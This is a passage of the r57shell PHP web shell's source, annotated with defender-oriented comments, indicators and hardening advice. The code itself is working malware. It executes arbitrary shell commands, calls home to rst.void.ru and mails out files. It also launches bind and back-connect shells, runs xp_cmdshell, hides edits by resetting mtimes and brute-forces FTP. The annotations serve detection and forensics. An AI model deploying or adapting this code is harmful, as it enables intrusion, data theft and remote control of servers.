// down prints $sysctl and $id without HTML encoding. For defenders: a response setting
// cookies named uname/id/sysctl whose values look like command output is a content
// signature for this script.
1488if($unix)
1489 {
1490 if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
1491 if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
1492 if($safe_mode) { $sysctl = '-'; }
1493 else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
1494 else
1495 {
// Tries the kern.* sysctl names first, then the kernel.* names; "-" when both fail.
1496 $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
1497 if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
1498 if(empty($sysctl)) { $sysctl = '-'; }
1499 setcookie('sysctl',$sysctl);
1500 }
1501 }
1502echo $head;
1503echo '</head>';
// Version check / call-home. On a page load with no `cmd` POST field, and only when the
// first octet of SERVER_ADDR is not 127, 192, 172 or 10, the script (a) embeds a
// zero-size image whose URL points at rst.void.ru and (b) fetches a second URL on the
// same host from the server side with readfile(), both carrying the script version.
// Only the first octet is compared, so every 192.x.x.x and 172.x.x.x address counts as
// internal.
// For defenders: outbound HTTP from a web server to that host or to the path
// /r57shell_version/version.php is a network indicator, and it tells a third party that
// the script is installed. readfile() on a URL only works with allow_url_fopen enabled.
1504if(empty($_POST['cmd'])) {
1505$serv = array(127,192,172,10);
1506$addr=@explode('.', $_SERVER['SERVER_ADDR']);
1507$current_version = str_replace('.','',$version);
1508if (!in_array($addr[0], $serv)) {
1509@print "<img src=\"http://rst.void.ru/r57shell_version/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>";
1510@readfile ("http://rst.void.ru/r57shell_version/version.php?version=".$current_version."");}}
1511echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(2).'<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2>';
1512echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b>";
1513echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
1514echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
1515if($unix)
1516 {
1517 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
1518 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
1519 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb;
1520 }
1521echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
1522echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
1523echo ws(2)."safe_mode: <b>";
1524echo (($safe_mode)?("<font color=green>ON</font>"):("<font color=red>OFF</font>"));
1525echo "</b>".ws(2);
1526echo "PHP version: <b>".@phpversion()."</b>";
1527$curl_on = @function_exists('curl_version');
1528echo ws(2);
1529echo "cURL: <b>".(($curl_on)?("<font color=green>ON</font>"):("<font color=red>OFF</font>"));
1530echo "</b>".ws(2);
1531echo "MySQL: <b>";
1532$mysql_on = @function_exists('mysql_connect');
1533if($mysql_on){
1534echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; }
1535echo "</b>".ws(2);
1536echo "MSSQL: <b>";
1537$mssql_on = @function_exists('mssql_connect');
1538if($mssql_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";}
1539echo "</b>".ws(2);
1540echo "PostgreSQL: <b>";
1541$pg_on = @function_exists('pg_connect');
1542if($pg_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";}
1543echo "</b>".ws(2);
1544echo "Oracle: <b>";
1545$ora_on = @function_exists('ocilogon');
1546if($ora_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";}
1547echo "</b><br>".ws(2);
1548echo "Disable functions : <b>";
1549if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
1550$free = @diskfreespace($dir);
1551if (!$free) {$free = 0;}
1552$all = @disk_total_space($dir);
1553if (!$all) {$all = 0;}
1554echo "<br>".ws(2)."Free space : <b>".view_size($free)."</b> Total space: <b>".view_size($all)."</b>";
1555echo '</font></td></tr><table>
1556<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
1557<tr><td align=right width=100>';
1558echo $font;
1559if($unix){
1560echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
1561echo "</td><td>";
1562echo "<font face=Verdana size=-2 color=red><b>";
1563echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
1564echo ws(3).$sysctl."<br>";
1565echo ws(3).ex('echo $OSTYPE')."<br>";
1566echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
1567if(!empty($id)) { echo ws(3).$id."<br>"; }
1568else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid'))
1569 {
1570 $euserinfo = @posix_getpwuid(@posix_geteuid());
1571 $egroupinfo = @posix_getgrgid(@posix_getegid());
1572 echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
1573 }
1574else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
1575echo ws(3).$dir;
1576echo ws(3).'( '.perms(@fileperms($dir)).' )';
1577echo "</b></font>";
1578}
1579else
1580{
1581echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
1582echo "</td><td>";
1583echo "<font face=Verdana size=-2 color=red><b>";
1584echo ws(3).@substr(@php_uname(),0,120)."<br>";
1585echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
1586echo ws(3).@getenv("USERNAME")."<br>";
1587echo ws(3).$dir;
1588echo "<br></font>";
1589}
1590echo "</font>";
1591echo "</td></tr></table>";
// $c1 and $c2 are assigned outside this section. If either is empty the script stops
// here, so none of the handlers below run.
// NOTE(review): presumably a tamper check on embedded footer markup; confirm where $f is printed.
1592if(empty($c1)||empty($c2)) { die(); }
1593$f = '<br>';
1594$f .= base64_decode($c1);
1595$f .= base64_decode($c2);
// cmd=mail: sends a message whose recipient, subject, body and From header all come
// straight from the request. The From value is concatenated into the header string
// unfiltered, so CR/LF in it would add further headers.
// Forensics: mail submitted by the web server account shows up in the MTA log.
1596if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
1597 {
1598 $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
// err() is defined outside this section; its argument is 6 plus mail()'s boolean result.
1599 err(6+$res);
// Clearing cmd keeps the value from reaching the command-execution branch further down.
1600 $_POST['cmd']="";
1601 }
// cmd=mail_file: reads a file named by the request and mails it as an attachment,
// i.e. any file readable by the PHP process can leave the host by e-mail.
// Indicators visible here: default subject 'file from r57shell' and default sender
// 'billy@microsoft.com' in outbound mail originating from the web server.
1602if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
1603 {
1604 if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
1605 else
1606 {
1607 $filename = @basename($_POST['loc_file']);
// The whole file is read into memory in one fread() sized by filesize().
1608 $filedump = @fread($file,@filesize($_POST['loc_file']));
1609 fclose($file);
1610 $content_encoding=$mime_type='';
// compress() is defined outside this section.
// NOTE(review): presumably it rewrites $filename/$filedump and sets $mime_type; confirm.
1611 compress($filename,$filedump,$_POST['compress']);
1612 $attach = array(
1613 "name"=>$filename,
1614 "type"=>$mime_type,
1615 "content"=>$filedump
1616 );
1617 if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; }
1618 if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
// mailattach() is defined outside this section; err() receives 6 plus its result.
1619 $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
1620 err(6+$res);
1621 $_POST['cmd']="";
1622 }
1623 }
// cmd=find_text: rewrites cmd into a find | xargs grep pipeline built from three request
// fields. s_dir is inserted unquoted and the other two sit inside single quotes without
// escaping, so the resulting string is fully request-controlled. It is executed later by
// the generic ex($_POST['cmd']) branch when safe_mode is off.
1624if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
1625{
1626$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
1627}
// cmd=ch_: changes owner, group or mode of a request-named path through PHP's own
// filesystem functions (no shell involved). Errors are suppressed with @ and nothing
// is reported back, so success or failure is only visible on disk.
// Forensics: unexpected ownership or mode changes on files the web server account can modify.
1628if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
1629 {
1630 switch($_POST['what'])
1631 {
1632 case 'own':
1633 @chown($_POST['param1'],$_POST['param2']);
1634 break;
1635 case 'grp':
1636 @chgrp($_POST['param1'],$_POST['param2']);
1637 break;
1638 case 'mod':
// param2 is parsed as an octal string before being used as the mode.
1639 @chmod($_POST['param1'],intval($_POST['param2'], 8));
1640 break;
1641 }
1642 $_POST['cmd']="";
1643 }
// cmd=mk: creates or deletes a file or directory at a request-supplied path, using PHP
// filesystem functions only. The path is not validated or confined to any directory.
1644if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
1645 {
1646 switch($_POST['what'])
1647 {
1648 case 'file':
1649 if($_POST['action'] == "create")
1650 {
// Refuses to overwrite: an existing path is reported through err(2, ...).
1651 if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
1652 else {
1653 fclose($file);
// Chains into the edit_file handler below by rewriting the request fields.
1654 $_POST['e_name'] = $_POST['mk_name'];
1655 $_POST['cmd']="edit_file";
1656 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
1657 }
1658 }
1659 else if($_POST['action'] == "delete")
1660 {
// unlink() is not @-suppressed here; a failure prints no shell message of its own.
1661 if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
1662 $_POST['cmd']="";
1663 }
1664 break;
1665 case 'dir':
1666 if($_POST['action'] == "create"){
1667 if(mkdir($_POST['mk_name']))
1668 {
1669 $_POST['cmd']="";
1670 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
1671 }
1672 else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
1673 }
1674 else if($_POST['action'] == "delete"){
1675 if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
1676 $_POST['cmd']="";
1677 }
1678 break;
1679 }
1680 }
// cmd=edit_file: renders an edit form for a request-named file and then exits.
// The file body is HTML-escaped, but e_name and $dir are echoed into the markup and
// into unquoted attribute values without escaping.
1681if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
1682 {
// Write probe: if opening for read/write fails the form is shown without a save button.
// When the probe succeeds, its handle is overwritten by the next fopen() without being closed.
1683 if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
1684 if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; }
1685 else {
1686 echo $table_up3;
1687 echo $font;
1688 echo "<form name=save_file method=post>";
1689 echo ws(3)."<b>".$_POST['e_name']."</b>";
1690 echo "<div align=center><textarea name=e_text cols=121 rows=24>";
1691 echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
1692 fclose($file);
1693 echo "</textarea>";
1694 echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
1695 echo "<input type=hidden name=dir value=".$dir.">";
1696 echo "<input type=hidden name=cmd value=save_file>";
1697 echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
1698 echo "</div>";
1699 echo "</font>";
1700 echo "</form>";
1701 echo "</td></tr></table>";
// Ends the request here; nothing after this handler runs for edit_file.
1702 exit();
1703 }
1704 }
// cmd=save_file: overwrites a request-named file with request-supplied content.
// Forensics: the previous modification time is captured first and put back with touch()
// after the write, so mtime alone will not show the edit. Compare ctime or use
// file-integrity hashes instead (touch() sets only access and modification times).
1705if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
1706 {
1707 $mtime = @filemtime($_POST['e_name']);
1708 if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); }
1709 else {
// On unix hosts, CRLF from the browser textarea is normalised to LF before writing.
1710 if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
1711 @fwrite($file,$_POST['e_text']);
// The handle is not explicitly closed in this block.
1712 @touch($_POST['e_name'],$mtime,$mtime);
1713 $_POST['cmd']="";
1714 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
1715 }
1716 }
// Six handlers that write an embedded helper program to /tmp (cf() and the payload
// variables are defined outside this section), optionally compile it with gcc, and start
// it in the background through ex(). Request fields are concatenated into the command
// lines without quoting or validation.
//
// Host indicators visible in this block:
//   files   /tmp/bd.c /tmp/bd /tmp/bdpl /tmp/back /tmp/back.c /tmp/backc
//           /tmp/dp /tmp/dpc.c /tmp/dpc
//   process gcc or perl started as a child of the web server / PHP process
// Only the .c sources are unlinked; the compiled binaries and the Perl scripts are left
// in /tmp. Hardening that breaks this path: no compiler on web hosts, /tmp mounted
// noexec, egress filtering, and alerting on new listeners owned by the web account.

// Bind listener, C variant: takes a port and a password from the request.
1717if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
1718{
1719 cf("/tmp/bd.c",$port_bind_bd_c);
1720 $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
1721 @unlink("/tmp/bd.c");
1722 $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
// cmd is replaced by a process listing so the operator sees whether the helper started.
1723 $_POST['cmd']="ps -aux | grep bd";
1724}
// Bind listener, Perl variant: bind_pass must be present but only the port is passed on.
1725if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
1726{
1727 cf("/tmp/bdpl",$port_bind_bd_pl);
1728 $p2=which("perl");
1729 $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
1730 $_POST['cmd']="ps -aux | grep bdpl";
1731}
// Outbound connect-back, Perl variant: destination ip and port come from the request.
1732if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
1733{
1734 cf("/tmp/back",$back_connect);
1735 $p2=which("perl");
1736 $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
1737 $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
1738}
// Outbound connect-back, C variant.
1739if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
1740{
1741 cf("/tmp/back.c",$back_connect_c);
1742 $blah = ex("gcc -o /tmp/backc /tmp/back.c");
1743 @unlink("/tmp/back.c");
1744 $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
1745 $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
1746}
// Port relay ("datapipe"), Perl variant: local port forwarded to a remote host and port.
1747if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
1748{
1749 cf("/tmp/dp",$datapipe_pl);
1750 $p2=which("perl");
1751 $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
1752 $_POST['cmd']="ps -aux | grep dp";
1753}
// Port relay, C variant. Argument order differs from the Perl variant (remote_port before remote_host).
1754if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
1755{
1756 cf("/tmp/dpc.c",$datapipe_c);
1757 $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
1758 @unlink("/tmp/dpc.c");
1759 $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
1760 $_POST['cmd']="ps -aux | grep dpc";
1761}
// Alias lookup: replaces cmd with a predefined command string from $aliases (defined
// outside this section) when the submitted alias name exists there.
1762if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
// File upload. Uses the legacy $HTTP_POST_FILES array (removed in PHP 5.4) and copy()
// rather than move_uploaded_file(). Both the target directory and the final name come
// from the request, so the upload can be written anywhere the PHP process may write.
1763if (!empty($HTTP_POST_FILES['userfile']['name']))
1764{
1765if(!empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
1766else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
1767@copy($HTTP_POST_FILES['userfile']['tmp_name'],
1768 $_POST['dir']."/".$nfn)
// The client-supplied file name is echoed into the error markup unescaped.
1769 or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
1770}
// Remote-to-local download: rewrites cmd into a command line for one of several
// fetch tools, resolved through which() (defined outside this section). rem_file and
// loc_file are concatenated unquoted, so the command string is request-controlled.
// It is executed later by the generic ex($_POST['cmd']) branch.
// Forensics: wget, fetch, lynx, links, GET or curl spawned by the web server account.
//
// The case labels are bare words, not strings. PHP versions before 8 treat an undefined
// constant as its own name (with a notice or warning); PHP 8 raises an Error instead.
1771if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
1772{
1773 switch($_POST['with'])
1774 {
1775 case wget:
1776 $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
1777 break;
1778 case fetch:
1779 $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
1780 break;
1781 case lynx:
1782 $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
1783 break;
1784 case links:
1785 $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
1786 break;
1787 case GET:
1788 $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
1789 break;
1790 case curl:
1791 $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
1792 break;
1793 }
1794}
// cmd=ftp_file_up / ftp_file_down: moves a file between this host and an FTP server
// chosen by the request, using PHP's ftp extension (no shell). This gives a second
// transfer channel besides HTTP upload and mail.
// Forensics: FTP sessions opened from the web server itself.
1795if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
1796 {
// split() was removed in PHP 7.0, so this handler only works on older interpreters.
1797 list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
1798 if(empty($ftp_port)) { $ftp_port = 21; }
1799 $connection = @ftp_connect ($ftp_server,$ftp_port,10);
1800 if(!$connection) { err(3); }
1801 else
1802 {
1803 if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
1804 else
1805 {
// Download: when loc_file is just the current directory, the remote base name is appended.
// NOTE(review): the transfer mode is read from $_POST['mode'], while the forms in this
// file submit a field named ftp_mode; the value is presumably empty here. Confirm.
1806 if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']); }
1807 if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']); }
1808 }
1809 }
// Called even when the connection attempt failed; the @ hides the resulting error.
1810 @ftp_close($connection);
1811 $_POST['cmd'] = "";
1812 }
// cmd=ftp_brute, setup phase: checks that the FTP server answers and that a user list
// is available. get_users() is defined outside this section.
// NOTE(review): presumably it returns local account names; confirm.
// On either failure cmd is cleared, which also skips the guessing loop further down.
1813if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
1814 {
1815 list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
1816 if(empty($ftp_port)) { $ftp_port = 21; }
1817 $connection = @ftp_connect ($ftp_server,$ftp_port,10);
1818 if(!$connection) { err(3); $_POST['cmd'] = ""; }
1819 else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
// The probe connection is closed; the loop later opens a fresh one per user.
1820 @ftp_close($connection);
1821 }
1822echo $table_up3;
// Default action when no cmd survived the handlers above: a directory listing through
// the shell (dir / ls -lia) when safe_mode is off, or the PHP-only safe_dir listing when on.
1823if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); }
1824else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
// The command text is echoed into the page without escaping before the output textarea opens.
1825echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
// Dispatcher for the output textarea.
// With safe_mode on, cmd selects one of several PHP-only routines (test1..test8) that
// read files or run commands through extensions instead of the shell. With safe_mode
// off, any cmd not handled elsewhere is passed to ex() as a shell command.
// Context for defenders: safe_mode was removed in PHP 5.4 and the mysql_* / mssql_*
// extensions in PHP 7.0, so these branches target legacy hosts. Where such hosts still
// exist, relevant hardening is unloading unused extensions (curl, imap, mbstring mail),
// denying the FILE privilege to web database accounts, and keeping xp_cmdshell disabled.
1826if($safe_mode)
1827{
1828 switch($_POST['cmd'])
1829 {
// Directory listing built from dir()/stat() rather than a shell command.
1830 case 'safe_dir':
1831 $d=@dir($dir);
1832 if ($d)
1833 {
1834 while (false!==($file=$d->read()))
1835 {
1836 if ($file=="." || $file=="..") continue;
1837 @clearstatcache();
// stat() gets the bare entry name, so it resolves against the current working directory.
// NOTE(review): correct only if the script changed into $dir earlier; confirm.
1838 list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
1839 if(!$unix){
1840 echo date("d.m.Y H:i",$mtime);
1841 if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
1842 }
1843 else{
1844 $owner = @posix_getpwuid($uid);
1845 $grgid = @posix_getgrgid($gid);
1846 echo $inode." ";
1847 echo perms(@fileperms($file));
1848 printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
1849 echo date("d.m.Y H:i ",$mtime);
1850 }
1851 echo "$file\n";
1852 }
1853 $d->close();
1854 }
// Bare-word array key: concatenates $language with the undefined constant _text29.
1855 else echo $lang[$language._text29];
1856 break;
// Reads a request-named local file through cURL's file:// scheme. The result of
// curl_exec() is echoed without escaping.
1857 case 'test1':
1858 $ci = @curl_init("file://".$_POST['test1_file']."");
1859 $cf = @curl_exec($ci);
1860 echo $cf;
1861 break;
// include() of a request-named path: any PHP inside the target is executed and the
// remaining text is emitted as output.
1862 case 'test2':
1863 @include($_POST['test2_file']);
1864 break;
// Reads a file through MySQL: loads it into a scratch table and selects it back.
// The file name is concatenated into the SQL text. Indicator: table temp_r57_table.
1865 case 'test3':
1866 if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
1867 $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
1868 if($db)
1869 {
1870 if(@mysql_select_db($_POST['test3_md'],$db))
1871 {
1872 @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
1873 @mysql_query("CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL )");
1874 @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");
1875 $r = @mysql_query("SELECT * FROM temp_r57_table");
1876 while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
1877 @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
1878 }
1879 else echo "[-] ERROR! Can't select database";
1880 @mysql_close($db);
1881 }
1882 else echo "[-] ERROR! Can't connect to mysql server";
1883 break;
// Runs a request-supplied command through MSSQL's xp_cmdshell and prints the rows
// captured in a scratch table. Indicator: table r57_temp_table; xp_cmdshell use is
// also visible in SQL Server auditing.
1884 case 'test4':
1885 if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
1886 $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
1887 if($db)
1888 {
1889 if(@mssql_select_db($_POST['test4_md'],$db))
1890 {
1891 @mssql_query("drop table r57_temp_table",$db);
1892 @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
1893 @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
1894 $res = mssql_query("select * from r57_temp_table",$db);
1895 while(($row=@mssql_fetch_row($res)))
1896 {
1897 echo $row[0]."\r\n";
1898 }
1899 @mssql_query("drop table r57_temp_table",$db);
1900 }
1901 else echo "[-] ERROR! Can't select database";
1902 @mssql_close($db);
1903 }
1904 else echo "[-] ERROR! Can't connect to MSSQL server";
1905 break;
// Reads a file by handing extra command-line options to the mail binary through
// mb_send_mail()'s last argument, then reading back /tmp/mb_send_mail.
// Indicator: the file /tmp/mb_send_mail, which this branch does not remove afterwards.
1906 case 'test5':
1907 if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
1908 $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail";
1909 @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
1910 $lines = file ('/tmp/mb_send_mail');
1911 foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; }
1912 break;
// Directory listing through the imap extension; entries are echoed unescaped.
1913 case 'test6':
1914 $stream = @imap_open('/etc/passwd', "", "");
1915 $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
1916 for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n";
1917 @imap_close($stream);
1918 break;
// File read through the imap extension; the body is echoed unescaped.
1919 case 'test7':
1920 $stream = @imap_open($_POST['test7_file'], "", "");
1921 $str = @imap_body($stream, 1);
1922 echo $str;
1923 @imap_close($stream);
1924 break;
// Copies a request-named source, opened through the compress.zlib:// wrapper, to a
// request-named destination, and prints a success or failure message.
1925 case 'test8':
1926 if(@copy("compress.zlib://".$_POST['test8_file1'], $_POST['test8_file2'])) echo $lang[$language.'_text118'];
1927 else echo $lang[$language.'_text119'];
1928 break;
1929 }
1930}
// safe_mode off: everything except the four commands with their own handlers is run
// as a shell command via ex() (defined outside this section); output is HTML-escaped.
// On Windows the output also passes through convert_cyr_string(), removed in PHP 8.0.
// Forensics: shell processes whose parent is the web server or PHP worker.
1931else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
1932 $cmd_rep = ex($_POST['cmd']);
1933 if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
1934 else { echo @htmlspecialchars($cmd_rep)."\n"; }}
// cmd=ftp_brute, guessing phase: for every name in $users it tries the name as its own
// password and, when the reverse option is set, the name spelled backwards. It relies
// on $users, $ftp_server and $ftp_port set by the earlier ftp_brute setup handler.
// Detection: a burst of FTP logins from the web host where the password equals the
// user name. Mitigation: login rate limiting and rejecting such passwords at account setup.
1935if ($_POST['cmd']=="ftp_brute")
1936 {
1937 $suc = 0;
1938 foreach($users as $user)
1939 {
// A new connection is opened for each user.
1940 $connection = @ftp_connect($ftp_server,$ftp_port,10);
